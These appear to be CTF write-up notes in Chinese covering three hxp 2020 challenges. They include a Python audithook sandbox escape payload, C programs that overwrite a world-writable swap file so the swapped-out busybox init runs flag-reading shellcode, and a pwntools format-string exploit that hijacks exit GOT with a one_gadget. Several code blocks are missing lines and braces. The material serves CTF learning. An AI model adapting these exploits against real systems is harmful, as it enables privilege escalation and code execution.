關於第一個目標,可以透過 __builtins__.__loader__.load_module 來取得 <bound method _load_module_shim of <class '_frozen_importlib.BuiltinImporter'>>,這樣就不需要 import module,可以在 audithook 不被 trigger 的情況下 import module。

之後透過 gc (garbage collection) 取得被 gc 所追蹤的 object list 來拿到被刪除的 modules:

  • Returns a list of all objects tracked by the collector, excluding the list returned. If generation is not None, return only the objects tracked by the collector that are in that generation
  • 不過目前 gc.get_object() 已經會 trigger audit event 了 (python 3.8.11, python 3.9)

在內部找到 main 以及 os 後,將 __exit 寫為 lambda x: None (_sys.modules['__main__'].__exit = lambda x: None),並使用 os 來執行 command。

而另一個方法則不受 gc.get_object() 被加入 audit event 所限制,先使用常見的 python sandbox 取得所有 module 的 payload ''.__class__.__base__.__subclasses__(),而某些 module 會使用 sys 作為 built-in function,因此需要找出該 module offset:

  • python 3.8 的 __globals__[] 會讓 object.__getattr__ audit event 叫,但是 python 3.9 卻不會 (?)

classes = ''.__class__.__base__.__subclasses__()
module_list = {}

for (i, v) in enumerate(classes):
    if '__globals__' not in dir(v.__init__):
    if 'sys' not in module_list and 'sys' in v.__init__.__globals__:
        module_list['sys'] = {
            'offset': i,
            'module': v.__init__.__globals__['sys']
    if 'os' not in module_list and 'os' in v.__init__.__globals__:
        module_list['os'] = {
            'offset': i,
            'module': v.__init__.__globals__['os']
    if '_os' not in module_list and '_os' in v.__init__.__globals__:
        module_list['_os'] = {
            'offset': i,
            'module': v.__init__.__globals__['_os']
    # if '__builtins__' not in module_list and '__builtins__' in v.__init__.__globals__:
    #     module_list['__builtins__'] = {
    #         'offset': i,
    #         'module': v.__init__.__globals__['__builtins__']
    #     }

但是 modules 被刪掉,沒辦法透過 ''.__class__.__base__.__subclasses__()[80].__init__.__globals__['sys'].modules['__main__'].__exit = lambda x: None 此種方式來取得 main 並蓋寫 exit,此時可以透過 try:... except: sys.exc_info 取得 call flow,

  • sys.exc_info() 回傳三個 value (type, value, traceback)
    • traceback.tb_frame: points to the execution frame of the current level
      • Accessing tb_frame raises an auditing event object.__getattr__ with arguments obj and "tb_frame"
      • tb_frame.f_back: f_back is to the previous stack frame (towards the caller)
      • tb_frame.f_globals: used for global variables

不過因為 tb_frame 現在會 trigger __getattr__,因此現在也無法 work 了,以下為 payload:

os = ''.__class__.__base__.__subclasses__()[99].__init__.__globals__['_os']
sys = ''.__class__.__base__.__subclasses__()[80].__init__.__globals__['sys']

    raise Exception()
except Exception as e:
    _, _, tb = sys.exc_info()
    fr = tb.tb_frame

    while fr:
        if 'audit' in fr.f_globals:
        fr = fr.f_back
    fr.f_globals['__exit'] = lambda x: None
  • -u: Force the stdout and stderr streams to be unbuffered. This option has no effect on the stdin stream
  • addaudithook(hook): 將 callback function 以 hook 的形式加到 interpreter 的執行過程
    • Append the callable hook to the list of active auditing hooks for the current (sub)interpreter
    • audit events table
  • exec(code, {}, {}): If the globals dictionary does not contain a value for the key builtins, a reference to the dictionary of the built-in module builtins is inserted under that key
    • 代表 builtin function 可以用,像是 __import__('os') 也可以
  • 題目沒有提供 python 的環境,因此 payload 應該在舊的 python 環境才能 work,比較新的 python 應該都被擋掉了



qemu-system-x86_64 \
    -smp 1 -m 100M \
    -kernel vmlinuz \
    -append "console=ttyS0 quiet ip=dhcp" \
    -initrd initramfs.cpio.gz \
    -fda flag.txt \
    -snapshot \
    -nographic \
    -monitor /dev/null \



/bin/busybox --install -s

stty raw -echo

chown -R 0:0 /

mkdir -p /proc && mount -t proc none /proc
mkdir -p /dev  && mount -t devtmpfs devtmpfs /dev
mkdir -p /tmp  && mount -t tmpfs tmpfs /tmp

umask 111

dd if=/dev/zero bs=1M count=10 of=/swap status=none
losetup /dev/loop0 /swap
mkswap /dev/loop0 >/dev/null
swapon /dev/loop0 >/dev/null
  • dd
    • bs: block size
  • losetup <loop_device> <file>: loop device 為 pseudo device,能夠與某個檔案連接,而後能將檔案給 mount 起來做存取
  • mkswap <device>: 指定 device 為 swap space
  • swapon <device>: 開啟 device 做 swap

swap 為 writable -rw-rw-rw- 1 0 0 10485760 Jul 19 18:07 swap,並且當在 kernel 使用過多 memory (mmap + MAP_SHARED),kernel 確實會把部分的 memory swap 到 /swap,POC 如下:

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <unistd.h>

int main()
    for (int i = 1; i <= 100; i++) {
        // 0x100000 == 1024*1024 == 1MB
        // all memory is 100MB
        void *mem = mmap(NULL, 0x100000, PROT_READ | PROT_WRITE | PROT_EXEC,
                 MAP_SHARED | MAP_ANONYMOUS, -1, 0);
        memset(mem, i, 0x100000);
        printf("%d\n", i);
        system("strings /swap");

    return 0;

而在 40MB 後開始出現 busybox 的 binary content:

Internal Server Error
Entity Too Large
HTTP/1.0 200 OK
, got TERM
%s: fatal: %s exists but is not a fifo
start log/
vfork, sleeping
stat ./log
stat log/down: log is not a directory
: name too long
readlink ./supervise
lock supervise/lock
readlink ./log/supervise
change back to service directory
lock log/supervise/lock

busybox 為 init process,此代表有 root 權限的 init 被 swap 出去,猜想是否能透過改寫 /swap 來讓 linux 將 init swap 回去後變成可控的 binary。有三種可能的攻擊方式:

  1. 將 kernel heap swap 出去,並改寫 kernel heap 上的 cred 做提權
  2. init swap 出去,並改寫成任意 shellcode 做 exploit
  3. 將 kernel code swap 出去,並改寫成任意 shellcode 做 exploit

不過 linux swap 的資料通常是不被頻繁使用的,因此在執行 exploit 過程中不能被執行,並且當資料被更改過後,必須可以被利用。

而 kernel heap 會很常被使用到,因此不考慮;在 POC 時已經看到 busybox 的 binary string 了,因此可以確定 init (實際上執行 sh -> busybox) 確實有被 swap 出去。並且 linux 會為了節省 physical memory 的使用空間,將 read-only (code section) 的 memory page 給多個 process 使用,因此我們能確定改到 init read-only page,並且會連帶影響後續執行 busybox 的情況。得出 exploit 步驟:

  • allocate memory 直到 busybox 被 swap 出來
  • 找到 busybox 中可以定位的 byte stream 或是字串,再透過 offset 去找到要修改的位置
  • 修改完畢後,執行修改到的 command

exit() 雖位於 0x4D1277,可是 shellcode 卻會在 0x4D12A7 被執行,猜測是 init0x4D12A4 執行 SYS_poll syscall 後 return,因此必須知道 return 的位置,在去 overwrite 那邊的 shellcode。

但是這會遇到 init 的 stack 也被 swap 掉 (?),導致 return 時會 trigger segmentation fault:

*RAX  0x4e
*RBX  0x0
 RCX  0x4d12a6 ◂— ret    
 RDX  0x0
*RDI  0xffffffffffffffff
 RSI  0x0
 R8   0x0
 R9   0x0
 R10  0x0
 R11  0x246
 R12  0x0
*R13  0x405914 ◂— sub    rsp, 0x18
*R14  0x0
 R15  0x0
*RBP  0xffffffff
*RSP  0x7ffce3627288
 RIP  0x4d12a6 ◂— ret    
 ► 0x4d12a6    ret    
   0x4d12a7    cmp    edi, 0xe
   0x4d12aa    jne    0x4d12d1 <0x4d12d1>
   0x4d12d1    mov    edx, edi
   0x4d12d3    movzx  ecx, di
   0x4d12d6    sar    edx, 0x10
   0x4d12d9    cmp    ecx, 0xffff
   0x4d12df    jne    0x4d1306 <0x4d1306>
   0x4d1306    cmp    edx, 2
   0x4d1309    je     0x4d1331 <0x4d1331>
   0x4d1331    cmp    ecx, 0x31
<Could not read memory at 0x7ffce3627288>
 ► f 0         0x4d12a6

可以看到 stack 位置已經跑掉了:

pwndbg> vmmap
          0x502000           0x504000 r-xp     2000 0      <qemu>
          0x703000           0x704000 r-xp     1000 0      <qemu>
    0x7ffce3646000     0x7ffce3647000 r-xp     1000 0      <qemu>
    0x7ffce364a000     0x7ffce364b000 r-xp     1000 0      <qemu>
0xffff89e740000000 0xffff89e740099000 rwxp    99000 0      <qemu>

但是有時候 payload 可以 work,猜測 stack 歪掉的原因是 swap 時出了問題。以下 exploit 為概念的 PoC,實際運作可能會因為環境而失敗:

mmap() 版本:

#define _GNU_SOURCE 
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define PAGE_1MB_SIZE 0x100000
#define MB_10 0xa00000
#define MAP_LIST_SIZE 0x80

mov rax, 2 
xor rdi, rdi 
push rdi 
mov rdi, 0x3064662f7665642f # /dev/fd0
push rdi 
mov rdi, rsp 
xor rsi, rsi 
mov rdi, rax 
xor rax, rax 
mov rsi, rsp 
mov rdx, 0x30 
mov rax, 1
mov rdi, 1

mov rax, 60
mov rdi, 1
char sc[] = {0x48, 0xc7, 0xc0, 0x2, 0x0, 0x0, 0x0, 0x48, 0x31, 0xff, 0x57, 0x48,
            0xbf, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x66, 0x64, 0x30, 0x57, 0x48,
            0x89, 0xe7, 0x48, 0x31, 0xf6, 0xf, 0x5, 0x48, 0x89, 0xc7, 0x48,
            0x31, 0xc0, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc2, 0x30, 0x0, 0x0, 0x0,
            0xf, 0x5, 0x48, 0xc7, 0xc0, 0x1, 0x0, 0x0, 0x0, 0x48, 0xc7, 0xc7,
            0x1, 0x0, 0x0, 0x0, 0xf, 0x5, 0x48, 0xc7, 0xc0, 0x3c, 0x0, 0x0, 0x0,
             0x48, 0xc7, 0xc7, 0x1, 0x0, 0x0, 0x0, 0xf, 0x5};

movsxd  rdi, edi
mov     eax, 0E7h
mov     edx, 3Ch
mov     rax, rdx
char needed[] = {0x48, 0x63, 0xff, 0xb8, 0xe7, 0x0, 0x0, 0x0, 0xf, 0x5, 0xba, 0x3c, 0x0, 0x0, 0x0, 0x48, 0x89, 0xd0, 0xf, 0x5};
void *map_list[MAP_LIST_SIZE] = {0};

int main()
    int fd = open("/swap", O_RDWR);
    if (fd == -1) {
        printf("open failed\n");
    if (ftruncate(fd, MB_10) == -1) {
        printf("ftruncate failed\n");
    unsigned char *swap = mmap(NULL, MB_10, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

    if (swap == NULL) {
        printf("mmap failed\n");

    for (int i = 1; i <= 0x1000; i++) {
        printf("Round %d\n", i);
        map_list[i-1] = mmap(NULL, PAGE_1MB_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
                 MAP_SHARED | MAP_ANONYMOUS, -1, 0);
        memset(map_list[i-1], 'A', PAGE_1MB_SIZE);
        if (msync(swap, MB_10, MS_SYNC) == -1) {
            printf("ftruncate failed\n");

        unsigned char *ptr;
        if ((ptr = memmem(swap, MB_10, needed, sizeof(needed))) != NULL) {
            printf("FOUND !\n");
            memcpy(ptr, sc, sizeof(sc));

        if (i != 1 && i-1 % MAP_LIST_SIZE == 0) {
            for (int j = 0; j < MAP_LIST_SIZE; j++) {
                munmap(map_list[j], PAGE_1MB_SIZE);

    munmap(swap, MB_10);

    return 0;

fd 版本:

#define _GNU_SOURCE 
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define PAGE_1MB_SIZE 0x100000
#define MB_10 0xa00000

mov rax, 2 
xor rdi, rdi 
push rdi 
mov rdi, 0x3064662f7665642f # /dev/fd0
push rdi 
mov rdi, rsp 
xor rsi, rsi 
mov rdi, rax 
xor rax, rax 
mov rsi, rsp 
mov rdx, 0x30 
mov rax, 1
mov rdi, 1

mov rax, 60
mov rdi, 1
unsigned char sc[] = {0x48, 0xc7, 0xc0, 0x2, 0x0, 0x0, 0x0, 0x48, 0x31, 0xff, 0x57, 0x48,
            0xbf, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x66, 0x64, 0x30, 0x57, 0x48,
            0x89, 0xe7, 0x48, 0x31, 0xf6, 0xf, 0x5, 0x48, 0x89, 0xc7, 0x48,
            0x31, 0xc0, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc2, 0x30, 0x0, 0x0, 0x0,
            0xf, 0x5, 0x48, 0xc7, 0xc0, 0x1, 0x0, 0x0, 0x0, 0x48, 0xc7, 0xc7,
            0x1, 0x0, 0x0, 0x0, 0xf, 0x5, 0x48, 0xc7, 0xc0, 0x3c, 0x0, 0x0, 0x0,
            0x48, 0xc7, 0xc7, 0x1, 0x0, 0x0, 0x0, 0xf, 0x5};

movsxd  rdi, edi
mov     eax, 0E7h
mov     edx, 3Ch
mov     rax, rdx
unsigned char needed[] = {0x48, 0x63, 0xFF, 0xB8, 0xE7, 0x00, 0x00, 0x00, 0x0F,
                            0x05, 0xBA, 0x3C, 0x00, 0x00, 0x00};

int main()
    if (swap == NULL) {
        printf("malloc failed\n");

    for (int i = 1; i <= 0x1000; i++) {
        void *mem = mmap(NULL, PAGE_1MB_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
                 MAP_SHARED | MAP_ANONYMOUS, -1, 0);
        memset(mem, 'A', PAGE_1MB_SIZE);
        int fd = open("/swap", O_RDWR);
        read(fd, swap, MB_10);

        unsigned char *ptr;
        if ((ptr = memmem(swap, MB_10, needed, sizeof(needed))) != NULL) {
            printf("FOUND !\n");
            lseek(fd, ptr-swap, SEEK_SET);
            write(fd, sc, sizeof(sc));


    return 0;
  • init 會去讀 /etc/inittab 作為設定檔,並依照內容依序啟動 process

    ::once:-setuidgid 1 sh
  • grep -ir pagesize /proc/1/smaps 用來看 page size,基本上為 4 KB


// file
still-printf: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/, BuildID[sha1]=f2cefe2bcfe57d69bf54ad1fce3e0ad5f9969980, for GNU/Linux 3.2.0, stripped

// checksec
[*] '/home/u1f383/tmp/hxpctf_2020/still-printf-d20188c31d06a593/still-printf/still-printf'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

程式邏輯很簡單,存在 fmt 漏洞,不過執行後會馬上 exit() :

#include <stdio.h>
#include <stdlib.h>

int main() {
	char buf[0x30]; // 48
	setbuf(stdout, NULL);
	fgets(buf, sizeof(buf), stdin);

分別在 15$ 以及 41$ 有 rbp chain 可以使用,但是 vfprintf 原始碼上記錄,當第一次遇到 $ 時代表 fmt 中含有 positional parameter,會去 LABEL do_positional 執行 printf_positional(),並且將後續 XX$ 對應到的 value 存到 args_value 做處理,因此一個 format string 中沒辦法透過 positional parameter 來完成 rbp chain,因此第一個 chain gadget 15$ 必須使用當前 fmt 對應的 parameter 完成。

而因為 exit() 的關係,因此 fmt 要蓋的 return address 為 printf() 的 return address,不過因為 stack 的位置受 ASLR 影響,因此必須猜 0x1000 次 (1.5 bytes random),才能改到正確的 41$,而 41$ 只需要透過 partial overwrite 就能把 return address 蓋成 main 中 fgets 的位置,因此不需要撞機率。

在第二次 fgets,就透過 partial overwrite exit_got 成 one gadget 即可,並且因為 payload 大小只能到 0x2f,因此用 $hn + $h 會剛好符合字數限制,以下為 exploit:


from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'

# r = process("./S", env={"LD_PRELOAD": "./"})
# gdb.attach(r, """
# dir /usr/src/glibc/glibc-2.28:/usr/src/glibc/glibc-2.28/stdio-common
# # b *printf_positional
# # b *vfprintf
# # b *vfprintf+7215
# # b *printf+189
# # c
# """)

while True:
    r = process("./S", env={"LD_PRELOAD": "./"})

    rbp1 = 15
    rbp2 = 41
    has_printed = 0

    fmt = "%c" # rsi
    has_printed += 1

    # leak stack
    fmt += "%p" # rdx
    has_printed += 14 # 0xFFFFFFFFFF

    fmt += "%c" # rcx
    has_printed += 1

    fmt += "%*c" # r8, r9
    has_printed += 1

    fmt += "%c"*6
    has_printed += 6

    # leak code
    fmt += "%p"
    has_printed += 14

    # leak libc
    fmt += "%p"
    has_printed += 14

    fmt += f"%{0xed38 - has_printed}c%hn" # 15$

    # 0x10DD == fgets()
    fmt += f"%{0xdd - 0x38}c%41$hhn" # 41$, use positional parameter

    stack = int(r.recv(12), 16)
    info(f"stack: {hex(stack)}")

    code = int(r.recv(12), 16) - 0x1200
    info(f"code: {hex(code)}")
    exit_got = code + 0x3380

    libc = int(r.recv(12), 16) - 0x2409b
    # 0x50186, 0x501e3, 0x103f50, 0x50186, 0x501ef, 0xdf1ee, 0xdf1f1
    one = libc + 0xdf1f1
    info(f"libc: {hex(libc)}")
    info(f"one: {hex(one)}")

    if (stack & 0xffff) != 0xed40:
        info("[-] not lucky, try again")

    written = 0
    def next_payload(n, bits):
        global written
        written_mask = written & ((1 << bits) - 1)

        if written_mask < n:
            written += n - written_mask
            return n - written_mask
            written += ((1 << bits) - written_mask) + n
            return ((1 << bits) - written_mask) + n

    payload = b''
    payload += ("%" + str(next_payload(one & 0xffff, 16)) + "c%10$hn").encode()
    payload += ("%" + str(next_payload((one & 0xffffffff) >> 16, 16)) + "c%11$hn").encode()
    payload = payload.ljust(0x20, b'\x00')
    payload += p64(exit_got) + p64(exit_got + 2)[:-1] # 10$, 11$
    print("--- Lucky! ---")